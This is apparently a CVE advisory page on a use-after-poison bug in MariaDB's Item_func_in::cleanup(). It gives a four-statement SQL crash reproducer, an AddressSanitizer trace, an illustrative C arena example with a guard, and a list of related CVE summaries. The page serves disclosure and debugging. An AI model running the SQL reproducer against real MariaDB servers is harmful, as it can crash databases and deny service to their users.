CVE-2022-27377: [MDEV-26281] ASAN use-after-poison when complex conversion is involved in blob
MariaDB Server v10.6.3 and below was discovered to contain a use-after-free in the component Item_func_in::cleanup(), which is triggered via specially crafted SQL statements. AddressSanitizer classifies the fault as a use-after-poison rather than a use-after-free: the 8-byte read at the crash site lands 13664 bytes inside a 24624-byte MEM_ROOT block that was allocated for the connection thread in THD::init_for_queries(), and the server had already marked that memory as inaccessible to the sanitizer when the root was freed (shadow bytes f7, "Poisoned by user") without handing the block back to malloc, which is why a plain freed-heap check would never fire. The read happens while DROP TABLE closes the temporary table: closefrm() calls Query_arena::free_items(), which runs delete_self() on every Item still on its free list, so an Item_func_in whose storage was freed earlier is still reachable from that list and its cleanup() dereferences the poisoned memory. The trace below was captured on an ASAN build of the 10.6.2 source tree (see the paths in the frames). Reproducing it needs an authenticated session that is allowed to create temporary tables; the four statements below, run in one session, end in the abort shown.
CREATE TEMPORARY TABLE v0 ( v2 TINYBLOB AS ( CURRENT_USER IS NULL IS UNKNOWN ) VIRTUAL , v1 TINYINT ZEROFILL , MEDIUM NCHAR BINARY GENERATED ALWAYS AS ( CONVERT ( v1 IN ( FALSE , CURRENT_USER ( ) IS NULL IS NULL , 34 ) , BINARY ( 97015438.000000 ) ) IS NOT UNKNOWN ) ) ;
ALTER TABLE v0 ADD COLUMN v0 MEDIUMINT ZEROFILL KEY UNIQUE COMMENT 'x' ;
INSERT IGNORE INTO v0 VALUES ( CONVERT ( 'x' LIKE v1 IS UNKNOWN , TIME ) , 'x' , v2 IN ( v2 SOUNDS LIKE v1 IS FALSE ) IS UNKNOWN , CONVERT ( 'x' REGEXP 'x' IS NOT FALSE USING BINARY ) IN ( TRUE LIKE v1 IS NOT UNKNOWN ) ) ;
DROP TABLE v0 ;
=================================================================
==3652686==ERROR: AddressSanitizer: use-after-poison on address 0x62b00007a760 at pc 0x55b5f9bdde1e bp 0x7f20a06bc570 sp 0x7f20a06bc560
READ of size 8 at 0x62b00007a760 thread T18
    #0 0x55b5f9bdde1d in Item_func_in::cleanup() /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item_cmpfunc.h:2566
    #1 0x55b5f8b42d30 in Item::delete_self() /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item.h:2514
    #2 0x55b5f8b42d30 in Query_arena::free_items() /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql_class.cc:3823
    #3 0x55b5f908c814 in closefrm(TABLE*) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/table.cc:4414
    #4 0x55b5f93e8b98 in THD::close_temporary_table(TABLE*) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/temporary_tables.cc:1238
    #5 0x55b5f93ee75d in THD::drop_temporary_table(TABLE*, bool*, bool) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/temporary_tables.cc:660
    #6 0x55b5f8f6f876 in mysql_rm_table_no_locks(THD*, TABLE_LIST*, st_mysql_const_lex_string const*, st_ddl_log_state*, bool, bool, bool, bool, bool, bool) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql_table.cc:1298
    #7 0x55b5f8f78e7b in mysql_rm_table(THD*, TABLE_LIST*, bool, bool, bool, bool) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql_table.cc:1044
    #8 0x55b5f8ccb268 in mysql_execute_command(THD*, bool) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql_parse.cc:4952
    #9 0x55b5f8c888dc in mysql_parse(THD*, char*, unsigned int, Parser_state*) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql_parse.cc:8028
    #10 0x55b5f8cbe2a3 in dispatch_command(enum_server_command, THD*, char*, unsigned int, bool) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql_parse.cc:1898
    #11 0x55b5f8cc3703 in do_command(THD*, bool) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql_parse.cc:1406
    #12 0x55b5f918314c in do_handle_one_connection(CONNECT*, bool) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql_connect.cc:1410
    #13 0x55b5f9184806 in handle_one_connection /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql_connect.cc:1312
    #14 0x55b5f9fcfeef in pfs_spawn_thread /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/storage/perfschema/pfs.cc:2201
    #15 0x7f20bfcea608 in start_thread /build/glibc-ZN95T4/glibc-2.31/nptl/pthread_create.c:477
    #16 0x7f20bf8be292 in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x122292)

0x62b00007a760 is located 13664 bytes inside of 24624-byte region [0x62b000077200,0x62b00007d230)
allocated by thread T18 here:
    #0 0x7f20c0275bc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8)
    #1 0x55b5fab5cafc in my_malloc /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/mysys/my_malloc.c:90
    #2 0x55b5fab437a8 in reset_root_defaults /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/mysys/my_alloc.c:148
    #3 0x55b5f8b36383 in THD::init_for_queries() /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql_class.cc:1405
    #4 0x55b5f9180d3a in prepare_new_connection_state(THD*) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql_connect.cc:1240
    #5 0x55b5f9181a4a in thd_prepare_connection(THD*) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql_connect.cc:1333
    #6 0x55b5f9181a4a in thd_prepare_connection(THD*) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql_connect.cc:1322
    #7 0x55b5f91830b2 in do_handle_one_connection(CONNECT*, bool) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql_connect.cc:1400
    #8 0x55b5f9184806 in handle_one_connection /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql_connect.cc:1312
    #9 0x55b5f9fcfeef in pfs_spawn_thread /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/storage/perfschema/pfs.cc:2201
    #10 0x7f20bfcea608 in start_thread /build/glibc-ZN95T4/glibc-2.31/nptl/pthread_create.c:477

Thread T18 created by T0 here:
    #0 0x7f20c01a2805 in pthread_create (/lib/x86_64-linux-gnu/libasan.so.5+0x3a805)
    #1 0x55b5f9fd01a2 in my_thread_create /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/storage/perfschema/my_thread.h:48
    #2 0x55b5f9fd01a2 in pfs_spawn_thread_v1 /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/storage/perfschema/pfs.cc:2252
    #3 0x55b5f8958098 in inline_mysql_thread_create /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/include/mysql/psi/mysql_thread.h:1139
    #4 0x55b5f8958098 in create_thread_to_handle_connection(CONNECT*) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/mysqld.cc:5919
    #5 0x55b5f89676b2 in handle_accepted_socket(st_mysql_socket, st_mysql_socket) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/mysqld.cc:6040
    #6 0x55b5f896847e in handle_connections_sockets() /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/mysqld.cc:6164
    #7 0x55b5f896a60b in mysqld_main(int, char**) /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/mysqld.cc:5814
    #8 0x7f20bf7c30b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)

SUMMARY: AddressSanitizer: use-after-poison /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item_cmpfunc.h:2566 in Item_func_in::cleanup()
Shadow bytes around the buggy address:
0x0c5680007490: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
0x0c56800074a0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
0x0c56800074b0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
0x0c56800074c0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
0x0c56800074d0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
=>0x0c56800074e0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7[f7]f7 f7 f7
0x0c56800074f0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
0x0c5680007500: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
0x0c5680007510: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
0x0c5680007520: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
0x0c5680007530: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3652686==ABORTING
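What "use-after-poison" means for this report, as an added illustration (example code written for this page, not MariaDB source; the arena, item and reference types and every function name are invented): a MEM_ROOT-style arena hands out pieces of one malloc'd block and, on reset, keeps the block but marks the used part inaccessible through ASAN's manual-poisoning API, which is what produces the f7 ("Poisoned by user") shadow bytes above. An Item-like object and its argument array live inside the arena, while the list that later runs cleanup on it is held outside, as Query_arena's free list is. The unchecked cleanup reproduces the faulting read; the checked variant records the arena generation in the outside reference and refuses to touch a stale item. That generation guard is offered as one way to make a dangling cleanup fail loudly, not as MariaDB's fix for MDEV-26281.

```c
/* Toy arena modelled loosely on MariaDB's MEM_ROOT, plus a generation check that
 * turns a dangling item cleanup into an error instead of a memory read.
 * Example code for this page; every type and function name is invented. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Manual poisoning is what makes ASAN report "use-after-poison" (shadow byte f7)
 * for arena memory that was logically freed but never handed back to malloc.
 * Without ASAN these macros compile to nothing. */
#ifndef __has_feature
#define __has_feature(x) 0
#endif
#if defined(__SANITIZE_ADDRESS__) || __has_feature(address_sanitizer)
#include <sanitizer/asan_interface.h>
#define POISON(p, n)   ASAN_POISON_MEMORY_REGION((p), (n))
#define UNPOISON(p, n) ASAN_UNPOISON_MEMORY_REGION((p), (n))
#else
#define POISON(p, n)   ((void)(p), (void)(n))
#define UNPOISON(p, n) ((void)(p), (void)(n))
#endif

typedef struct {
    unsigned char *buf;   /* one malloc'd block, kept across resets like a MEM_ROOT block */
    size_t size, used;
    unsigned generation;  /* bumped by every reset; stale references compare unequal */
} arena_t;
/* Lives inside the arena, as an Item does in the THD mem_root; args is arena memory too. */
typedef struct { size_t arg_count; size_t *args; } item_in_t;
/* Held outside the arena, as an entry on Query_arena's free list is. */
typedef struct { arena_t *arena; item_in_t *item; unsigned generation; } item_ref_t;

int arena_init(arena_t *a, size_t size) {
    if (!(a->buf = malloc(size))) return -1;
    a->size = size; a->used = 0; a->generation = 1;
    POISON(a->buf, size);                   /* nothing handed out yet */
    return 0;
}

void *arena_alloc(arena_t *a, size_t n) {
    n = (n + 7) & ~(size_t)7;               /* 8-byte granularity, same as the ASAN shadow */
    if (n > a->size - a->used) return NULL;
    void *p = a->buf + a->used;
    UNPOISON(p, n);
    a->used += n;
    return p;
}

/* Analogue of free_root(): the block stays allocated for reuse (the next alloc
 * returns the same address), so only the poison tells ASAN it is no longer live. */
void arena_reset(arena_t *a) {
    POISON(a->buf, a->used);
    a->used = 0;
    a->generation++;
}

void arena_destroy(arena_t *a) { UNPOISON(a->buf, a->size); free(a->buf); a->buf = NULL; }

int item_in_create(arena_t *a, const size_t *values, size_t count, item_ref_t *out) {
    item_in_t *it = arena_alloc(a, sizeof *it);
    size_t *args = arena_alloc(a, count * sizeof *args);
    if (!it || !args) return -1;
    memcpy(args, values, count * sizeof *args);
    it->args = args; it->arg_count = count;
    out->arena = a; out->item = it; out->generation = a->generation;
    return 0;
}

/* The faulting pattern: reads item fields unconditionally.  Called after
 * arena_reset() under ASAN, this read is the use-after-poison. */
size_t item_in_cleanup_unchecked(const item_in_t *it) {
    size_t sum = 0;
    for (size_t i = 0; i < it->arg_count; i++) sum += it->args[i];
    return sum;
}

/* Guarded variant: 0 and the IN-list sum on success, -1 on a stale reference. */
int item_in_cleanup_checked(const item_ref_t *ref, size_t *sum_out) {
    if (ref->generation != ref->arena->generation) return -1;
    *sum_out = item_in_cleanup_unchecked(ref->item);
    return 0;
}

/* The sequence from the stack trace: create the item, free its arena (closefrm ->
 * free_root), then run cleanup from the outside list.  Returns 0 when the guard
 * catches the stale reference; unchecked != 0 takes the faulting path instead. */
int reproduce_stale_cleanup(int unchecked) {
    arena_t a; item_ref_t ref; size_t sum = 0; int rc = 0;
    const size_t in_list[] = {0, 1, 34};    /* constructed sample values */
    if (arena_init(&a, 4096) != 0 || item_in_create(&a, in_list, 3, &ref) != 0) return 1;
    if (item_in_cleanup_checked(&ref, &sum) != 0 || sum != 35) rc = 2;
    arena_reset(&a);
    if (unchecked) (void)item_in_cleanup_unchecked(ref.item);  /* ASAN reports here */
    else if (item_in_cleanup_checked(&ref, &sum) != -1) rc = 3;
    arena_destroy(&a);
    return rc;
}

int main(int argc, char **argv) {
    int rc = reproduce_stale_cleanup(argc > 1 && strcmp(argv[1], "crash") == 0);
    printf("stale cleanup %s\n", rc == 0 ? "caught by generation check" : "NOT caught");
    return rc;
}
```

Build with `cc -g -fsanitize=address example.c` and run `./a.out crash` to get a use-after-poison report whose allocation site is the arena's malloc, the same shape as the report above; run it without the argument to see the guard refuse the stale item. Compiled without -fsanitize=address the poison macros are empty and the unchecked path silently reads whatever the reused block holds, which is the production behaviour that keeps this class of bug invisible until the reused memory no longer looks like an Item.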
Related news
An issue in the component Create_tmp_table::finalize of MariaDB Server v10.7 and below was discovered to allow attackers to cause a Denial of Service (DoS) via specially crafted SQL statements.
MariaDB Server v10.6 and below was discovered to contain a use-after-free in the component my_strcasecmp_8bit, which is exploited via specially crafted SQL statements.
MariaDB Server v10.7 and below was discovered to contain a global buffer overflow in the component decimal_bin_size, which is exploited via specially crafted SQL statements.
An issue in the component Used_tables_and_const_cache::used_tables_and_const_cache_join of MariaDB Server v10.7 and below was discovered to allow attackers to cause a Denial of Service (DoS) via specially crafted SQL statements.
An issue in the component Item_subselect::init_expr_cache_tracker of MariaDB Server v10.6 and below was discovered to allow attackers to cause a Denial of Service (DoS) via specially crafted SQL statements.
An issue in the component Arg_comparator::compare_real_fixed of MariaDB Server v10.6.2 and below was discovered to allow attackers to cause a Denial of Service (DoS) via specially crafted SQL statements.
An issue in the component Field::set_default of MariaDB Server v10.6 and below was discovered to allow attackers to cause a Denial of Service (DoS) via specially crafted SQL statements.
Subversion's mod_dav_svn is vulnerable to memory corruption. While looking up path-based authorization rules, mod_dav_svn servers may attempt to use memory which has already been freed. Affected Subversion mod_dav_svn servers 1.10.0 through 1.14.1 (inclusive). Servers that do not use mod_dav_svn are not affected.
MinIO is a High Performance Object Storage released under GNU Affero General Public License v3.0. A security issue was found where an non-admin user is able to create service accounts for root or other admin users and then is able to assume their access policies via the generated credentials. This in turn allows the user to escalate privilege to that of the root user. This vulnerability has been resolved in pull request #14729 and is included in `RELEASE.2022-04-12T06-55-35Z`. Users unable to upgrade may workaround this issue by explicitly adding a `admin:CreateServiceAccount` deny policy, however, this, in turn, denies the user the ability to create their own service accounts as well.
An arbitrary file upload vulnerability in the file upload module of Strapi v4.1.5 allows attackers to execute arbitrary code via a crafted file.
Grafana is an open-source platform for monitoring and observability. When fine-grained access control is enabled and a client uses Grafana API Key to make requests, the permissions for that API Key are cached for 30 seconds for the given organization. Because of the way the cache ID is constructed, the consequent requests with any API Key evaluate to the same permissions as the previous requests. This can lead to an escalation of privileges, when for example a first request is made with Admin permissions, and the second request with different API Key is made with Viewer permissions, the second request will get the cached permissions from the previous Admin, essentially accessing higher privilege than it should. The vulnerability is only impacting Grafana Enterprise when the fine-grained access control beta feature is enabled and there are more than one API Keys in one organization with different roles assigned. All installations after Grafana Enterprise v8.1.0-beta1 should be upgraded ...
An arbitrary file upload vulnerability in the file upload module of Ghost CMS v4.42.0 allows attackers to execute arbitrary code via a crafted file.
An arbitrary file upload vulnerability in the file upload module of PayloadCMS v0.15.0 allows attackers to execute arbitrary code via a crafted SVG file.
A SQL injection issue was discovered in QuerySet.explain() in Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4. This occurs by passing a crafted dictionary (with dictionary expansion) as the **options argument, and placing the injection payload in an option name.
Nokogiri is an open source XML and HTML library for Ruby. Nokogiri `< v1.13.4` contains an inefficient regular expression that is susceptible to excessive backtracking when attempting to detect encoding in HTML documents. Users are advised to upgrade to Nokogiri `>= 1.13.4`. There are no known workarounds for this issue.
PrivateBin is minimalist, open source online pastebin clone where the server has zero knowledge of pasted data. In PrivateBin < v1.4.0 a cross-site scripting (XSS) vulnerability was found. The vulnerability is present in all versions from v0.21 of the project, which was at the time still called ZeroBin. The issue is caused by the fact that SVGs can contain JavaScript. This can allow an attacker to execute code, if the user opens a paste with a specifically crafted SVG attachment, and interacts with the preview image and the instance isn't protected by an appropriate content security policy. Users are advised to either upgrade to version 1.4.0 or to ensure the content security policy of their instance is set correctly.
GoCD is an open source continuous delivery server. The bundled gocd-ldap-authentication-plugin included with the GoCD Server fails to correctly escape special characters when using the username to construct LDAP queries. While this does not directly allow arbitrary LDAP data exfiltration, it can allow an existing LDAP-authenticated GoCD user with malicious intent to construct and execute malicious queries, allowing them to deduce facts about other users or entries within the LDAP database (e.g. alternate fields, usernames, hashed passwords etc.) through brute force mechanisms. This only affects users who have a working LDAP authorization configuration enabled on their GoCD server, and is only exploitable by users authenticating using such an LDAP configuration. This issue has been fixed in GoCD 22.1.0, which is bundled with gocd-ldap-authentication-plugin v2.2.0-144.
Elide is a Java library that lets you stand up a GraphQL/JSON-API web service with minimal effort. When leveraging the following together: Elide Aggregation Data Store for Analytic Queries, Parameterized Columns (A column that requires a client provided parameter), and a parameterized column of type TEXT. There is the potential for a hacker to provide a carefully crafted query that would bypass server side authorization filters through SQL injection. A recent patch to Elide 6.1.2 allowed the '-' character to be included in parameterized TEXT columns. This character can be interpreted as SQL comments ('--') and allow the attacker to remove the WHERE clause from the generated query and bypass authorization filters. A fix is provided in Elide 6.1.4. The vulnerability only exists for parameterized columns of type TEXT and only for analytic queries (CRUD is not impacted). Workarounds include leveraging a different type of parameterized column (TIME, MONEY, etc) or not leveraging parameteriz...
JHipster is a development platform to quickly generate, develop, & deploy modern web applications & microservice architectures. SQL Injection vulnerability in entities for applications generated with the option "reactive with Spring WebFlux" enabled and an SQL database using r2dbc. Applications created without "reactive with Spring WebFlux" and applications with NoSQL databases are not affected. Users who have generated a microservice Gateway using the affected version may be impacted as Gateways are reactive by default. Currently, SQL injection is possible in the findAllBy(Pageable pageable, Criteria criteria) method of an entity repository class generated in these applications as the where clause using Criteria for queries are not sanitized and user input is passed on as it is by the criteria. This issue has been patched in v7.8.1. Users unable to upgrade should be careful when combining criterias and conditions as the root of the issue lies in the `EntityManager.java` class when cre...
Garden is an automation platform for Kubernetes development and testing. In versions prior to 0.12.39 multiple endpoints did not require authentication. In some operating modes this allows for an attacker to gain access to the application erroneously. The configuration is leaked through the /api endpoint on the local server that is responsible for serving the Garden dashboard. At the moment, this server is accessible to 0.0.0.0 which makes it accessible to anyone on the same network (or anyone on the internet if they are on a public, static IP). This may lead to the ability to compromise credentials, secrets or environment variables. Users are advised to upgrade to version 0.12.39 as soon as possible. Users unable to upgrade should use a firewall blocking access to port 9777 from all untrusted network machines.